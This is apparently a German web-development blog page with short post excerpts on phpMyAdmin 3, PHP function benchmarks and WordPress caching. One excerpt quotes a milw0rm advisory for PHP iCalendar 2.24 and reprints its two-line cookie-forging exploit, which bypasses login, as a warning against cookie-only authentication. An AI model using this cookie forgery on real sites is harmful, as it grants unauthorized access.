webdev blog
An diesem Wochenende wurde die 3. Version des MySQL-Verwaltungstools phpMyAdmin veröffentlicht.
Die Hauptänderung ist die Unterstützung für MySQL 5.1 sowie die Maria- und PBXT Storage Engine. Die Maria-Engine soll auf lange Sicht die standardmäßig verwendete MyISAM-Engine ablösen.
Allerdings ist damit die Unterstützung für ältere MySQL Versionen weggefallen, so das man jetzt MySQL 5.00 oder höher benötigt. Als [...]
Heute habe ich bei milw0rm.com folgenden Fehler im Script “PHP iCalendar” gefunden:
####################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
—
exploit:
javascript:document.cookie = “phpicalendar_login=1; path=/”;
javascript:document.cookie = “phpicalendar=1; path=/”;
# milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526
Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten [...]
Das sich die Ausführungsgeschwindigkeit von verschiedenen Funktionen in PHP unterscheidet sollte eigentlich bekannt sein. Chris Vincent hat dazu nun auf der Seite phpbench.com dazu eine Übersicht bereitgestellt, welche die verschiedenen Funktionen miteinander vergleicht. Dazu gibt es zu jeder Funktion Code-Beispiele.
So sieht man z.B. schön, dass die Verwendung von foreach() beim Abarbeiten eines Hashs deutlich schneller [...]
Wordpress ist im allgemeinen doch recht schnell. Man kann durch PHP-Optimizer noch etwas Geschwindigkeit ‘rausholen. Dazu bietet sich z.B. eAccelerator an, welcher als Fork aus dem mmcache hervorging.
Gerade habe ich eine andere, einfach zu installierende Möglichkeit entdeckt, welch auch ohne Server-Zugang zur Installation von PHP-Modulen auskommt: ein einfach zu installierende Wordpress Plugin namens “WP-Cache”
Dieses wird [...]